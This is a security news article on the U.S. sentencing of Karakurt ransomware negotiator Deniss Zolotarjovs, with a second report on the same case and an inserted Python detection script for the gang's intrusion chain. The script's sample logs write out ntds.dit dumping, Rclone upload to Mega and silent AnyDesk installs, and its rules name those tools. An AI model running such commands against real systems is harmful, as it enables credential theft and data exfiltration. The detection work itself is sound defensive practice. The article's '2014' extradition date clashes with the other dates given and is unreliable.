U.S. court sentences Karakurt ransomware negotiator to 8.5 years

Deniss Zolotarjovs was sentenced to 8.5 years in the U.S. after pleading guilty to money laundering and fraud tied to ransomware.

Deniss Zolotarjovs, a Latvian national linked to the Karakurt ransomware gang, has been sentenced to 8.5 years in U.S. prison, marking a significant step in efforts to combat global ransomware operations.

“A Latvian national was sentenced today to 102 months in prison for his role in a major Russian ransomware organization that stole from and extorted over 54 companies.” reads the press release published by DoJ.

In August 2024, the man was charged with money laundering, wire fraud, and extortion. He was arrested in Georgia in December 2023 and extradited to the U.S. in 2014.

In 2025, he pleaded guilty to money laundering and wire fraud conspiracy. Rather than carrying out technical intrusions, Zolotarjovs acted as a negotiator and strategist.

He analyzed stolen data, set ransom demands, and communicated directly with victims, earning about 10% of ransom payments through cryptocurrency laundering. Prosecutors described him as a key intermediary within a broader cybercrime ecosystem tied to former members of the Conti ransomware group.

Between 2021 and 2023, the group targeted over 54 organizations, causing over $56 million in losses. Victims included businesses, government entities, and even a pediatric healthcare provider.

“According to court documents, Deniss Zolotarjovs (Денисс Золотарёвс), 35, of Moscow, Russia, was a member of a ransomware organization led by former leaders of the Conti ransomware group. Brands used to identify the organization in ransom notes to their victims during the time of his involvement include Conti, Karakurt, Royal, TommyLeaks, SchoolBoys Ransomware, and Akira, among others.” continues the press release. “During the time of Zolotarjovs’s active participation in the organization, approximately June 2021 to August 2023, the organization stole data from over 54 companies, including many in the United States.”

In one case, Zolotarjovs suggested leaking children’s medical data to pressure payment, highlighting the coercive tactics used. Another attack disrupted a U.S. 911 emergency dispatch system, underscoring the real-world impact of these operations.

“In one attack on a pediatric healthcare company, Zolotarjovs deliberately leveraged children’s health information for extortion.” DoJ states. “When he failed in extracting a ransom from this victim, he urged coconspirators to be “DESTROYERS” and to leak or sell copies of these pediatric health records to sow fear among future victims.”

Authorities say the case reflects the increasingly organized and professional nature of ransomware groups, which operate like businesses with defined roles such as negotiators, operators, and data brokers. It also demonstrates growing international cooperation, particularly between U.S. agencies and Georgian authorities, in tracking and prosecuting cybercriminals.

Officials from the Federal Bureau of Investigation emphasized that this sentencing sends a strong message: even individuals operating within Russia-linked cybercrime networks can be identified, pursued, and brought to justice. The case highlights both the human cost of ransomware attacks and the expanding reach of global law enforcement in tackling cyber extortion.

“With this sentence, a cruel, ruthless, and dangerous international cybercriminal is now behind bars,” said Assistant Attorney General A. Tysen Duva of the Justice Department’s Criminal Division. “Deniss Zolotarjovs helped his ransomware gang profit from hacks of dozens of companies, and even on a government entity whose 911 system was forced offline. He also used stolen children’s health information to increase his leverage to extort victim payments. The Criminal Division will continue to investigate and prosecute international hackers and extortionists from around the world, no matter where they live or operate.”

Accenture researchers first detailed the activity of this sophisticated, financially motivated threat actor in December 2021. The group’s activity was first spotted in June 2021, but it became more active in Q3 2021.

Zolotarjovs is the first member of the Karakurt group to be sentenced in the United States.

Most of the known victims are based in North America, while the remainder are in Europe.

The analysis of the attack chain associated with this threat actor revealed that it primarily leverages VPN credentials to gain initial access to the target’s network.

In the initial attacks, the group established persistence with the popular post-exploitation tool Cobalt Strike. Later, the group switched to the VPN IP pool or AnyDesk software to maintain persistence and avoid detection.

Once inside the target network, the group used various tools to escalate privileges, including Mimikatz, or PowerShell to steal the ntds.dit file, which contains the Active Directory database.

However, in most attacks the threat group escalated privileges using previously obtained credentials.

For data exfiltration, the group used 7zip and WinZip for compression, and Rclone or FileZilla (SFTP) to upload the data to Mega.io cloud storage.
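The chain described above (credential theft via ntds.dit, archive staging with 7-Zip or WinZip, upload with Rclone or an SFTP client, AnyDesk for persistence) is something a defender can look for in process-creation telemetry. The following Python sketch is an added example, not code from the article, the DoJ, or the agencies that issued the alert: the log lines are constructed in a simple key=value format, the regular expressions are assumptions drawn from the tooling named above rather than a vendor signature set, and the correlation step groups hits by account so that a single stage (an administrator zipping a report) stays informational while an account touching several stages of the chain is escalated.

```python
"""Detection sketch for the Karakurt-style intrusion chain: ntds.dit theft,
archive staging, Rclone/SFTP upload, AnyDesk persistence. Runs over
constructed process-creation events (not real telemetry)."""
import re
from collections import defaultdict

# Constructed sample events. Backslash-escaped quotes inside cmdline are kept
# as a log source would emit them.
SAMPLE_LOG = r'''
ts=2023-03-02T01:12:44Z host=DC01 user=CORP\adm_j image="C:\Windows\System32\ntdsutil.exe" cmdline="ntdsutil \"ac i ntds\" ifm \"create full C:\temp\ntds\" q q"
ts=2023-03-02T01:20:03Z host=FS01 user=CORP\adm_j image="C:\Program Files\7-Zip\7z.exe" cmdline="7z.exe a -mx1 C:\temp\hr.7z \\FS01\shares\HR"
ts=2023-03-02T01:41:17Z host=FS01 user=CORP\adm_j image="C:\temp\rclone.exe" cmdline="rclone.exe copy C:\temp\hr.7z mega:backup --transfers 8"
ts=2023-03-02T02:05:59Z host=WS17 user=CORP\jsmith image="C:\Users\jsmith\Downloads\AnyDesk.exe" cmdline="AnyDesk.exe --install C:\ProgramData\AnyDesk --start-with-win --silent"
ts=2023-03-02T09:15:00Z host=WS22 user=CORP\mlee image="C:\Program Files\7-Zip\7z.exe" cmdline="7z.exe a report.zip Q1-report.docx"
'''

# key=value, or key="value with spaces and \" escapes"
KV = re.compile(r'(\w+)=(?:"((?:[^"\\]|\\.)*)"|(\S+))')

# (rule name, chain stage, pattern over the lower-cased command line).
# Assumed patterns derived from the article's TTPs; tune against real baselines.
RULES = (
    ("ntds_dump", "credential access",
     re.compile(r"ntdsutil.*\bifm\b|ntds\.dit|vssadmin\s+create\s+shadow")),
    ("archive_staging", "collection",
     re.compile(r"\b(7z|7za|winzip|wzzip)(\.exe)?\s+a\s")),
    ("rclone_upload", "exfiltration",
     re.compile(r"\brclone(\.exe)?\s+(copy|sync|move)\b")),
    ("sftp_upload", "exfiltration",
     re.compile(r"filezilla|\bsftp://")),
    ("anydesk_persist", "persistence",
     re.compile(r"\banydesk(\.exe)?\b.*--(install|start-with-win)\b")),
)


def parse_line(line):
    """Parse one key=value event line into a dict, unescaping backslash-quote."""
    event = {}
    for key, quoted, bare in KV.findall(line):
        value = quoted if quoted else bare
        event[key] = value.replace('\\"', '"')
    return event


def detect(log_text):
    """Return one finding per (event, rule) match."""
    findings = []
    for line in log_text.strip().splitlines():
        event = parse_line(line)
        cmd = event.get("cmdline", "").lower()
        for name, stage, pattern in RULES:
            if pattern.search(cmd):
                findings.append({"ts": event["ts"], "host": event["host"],
                                 "user": event["user"], "rule": name,
                                 "stage": stage})
    return findings


def correlate(findings, min_stages=2):
    """Group findings by account. One stage alone is informational; an account
    touching min_stages or more distinct chain stages (possibly across hosts)
    is escalated."""
    by_user = defaultdict(list)
    for f in findings:
        by_user[f["user"]].append(f)
    summary = {}
    for user, hits in by_user.items():
        stages = sorted({h["stage"] for h in hits})
        summary[user] = {
            "stages": stages,
            "hosts": sorted({h["host"] for h in hits}),
            "escalate": len(stages) >= min_stages,
        }
    return summary


if __name__ == "__main__":
    for user, info in correlate(detect(SAMPLE_LOG)).items():
        flag = "ESCALATE" if info["escalate"] else "info"
        print(f"{flag:8} {user:14} stages={info['stages']} hosts={info['hosts']}")
```

Correlating on the account rather than the host matters here because the article's chain reuses previously obtained credentials: in the constructed sample the same admin account dumps ntds.dit on the domain controller and then stages and uploads data from a file server, which is only visible as one incident when the hits are joined by user.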

The Karakurt cyber extortion group typically gave victims one week to pay a ransom, ranging from $25,000 to $13 million in Bitcoin. This information comes from a joint alert issued by the FBI, CISA, the Department of the Treasury, and FinCEN.

Pierluigi Paganini

(SecurityAffairs – hacking, Karakurt ransomware)

Latvian Cybercriminal Jailed for Role in Multi-Million Dollar Ransomware Scheme

Ransomware Organization Sentencing

A ransomware organization sentencing has brought one of the key operatives behind a major cybercrime group to justice, highlighting the global reach of law enforcement in tackling ransomware attacks. A Latvian national, Deniss Zolotarjovs, has been sentenced to 102 months in prison for his role in a Russian-linked ransomware organization responsible for targeting more than 54 companies worldwide. The sentencing marks a significant development in ongoing efforts to dismantle international ransomware networks. According to the U.S. Department of Justice, Zolotarjovs played a central role in extortion operations carried out between June 2021 and August 2023. The group operated under multiple ransomware brands, including Conti, Karakurt, Royal, TommyLeaks, SchoolBoys Ransomware, and Akira, reflecting a complex and evolving cybercrime structure.

Ransomware Organization Sentencing: Role in Extortion and Data Exploitation

Officials said Zolotarjovs was primarily responsible for increasing pressure on victims who hesitated to pay ransom demands. He analyzed stolen data and used sensitive information to intensify extortion tactics. In one case involving a pediatric healthcare provider, Zolotarjovs used children’s health information to pressure the organization into paying. When the ransom demand was not met, he allegedly encouraged co-conspirators to leak or sell the data. Court documents reveal he distributed a bulk set of sensitive records to hundreds of patients, aiming to amplify fear and force compliance. Assistant Attorney General A. Tysen Duva described Zolotarjovs as a “cruel, ruthless, and dangerous international cybercriminal,” noting that his actions included exploiting highly personal data to increase leverage over victims.

Financial and Operational Impact of Attacks

The ransomware organization’s activities caused widespread damage. Of the more than 54 targeted companies, attacks on 13 resulted in losses exceeding $56 million, including approximately $2.8 million paid in ransom. An additional 41 companies are believed to have paid around $13 million, though detailed loss figures are still being compiled. Authorities estimate that the total financial impact could reach hundreds of millions of dollars when factoring in underreported incidents. Beyond financial losses, the attacks led to the exposure of highly sensitive data, including Social Security numbers, addresses, dates of birth, and healthcare records. In one instance, a government entity’s 911 emergency system was forced offline, raising serious concerns about public safety and the broader consequences of ransomware attacks.

Organized Structure and Global Operations

Investigators found that the ransomware organization operated with a structured hierarchy and used a network of companies across Russia, Europe, and the United States to mask its activities. Members were largely based in Russia and reportedly operated from an office in St. Petersburg. The group’s operations also involved corruption and misuse of public resources. Authorities said some members had ties to former Russian law enforcement, allowing them to access databases, intimidate individuals, and identify potential recruits. These connections also enabled members to avoid scrutiny, including evading taxes and military service through bribes.

Arrest, Extradition, and Prosecution

Zolotarjovs was arrested in Georgia in December 2023 and later extradited to the United States in August 2024 after contesting the process. In July 2025, he pleaded guilty to conspiracy charges involving money laundering and wire fraud. The case was investigated by the Federal Bureau of Investigation, with support from multiple field offices and international partners. Special Agent in Charge Jason Cromartie said the case reflects the agency’s continued efforts to track down cybercriminals operating across borders. U.S. Attorney Dominick S. Gerace II added that the prosecution demonstrates that cybercriminals cannot rely on geography or anonymity to evade justice.

Continued Focus on Ransomware Threats

The ransomware organization sentencing highlights the scale and persistence of ransomware threats targeting businesses and public services. Authorities said investigations into related actors and networks remain ongoing as part of broader efforts to disrupt global cybercrime operations.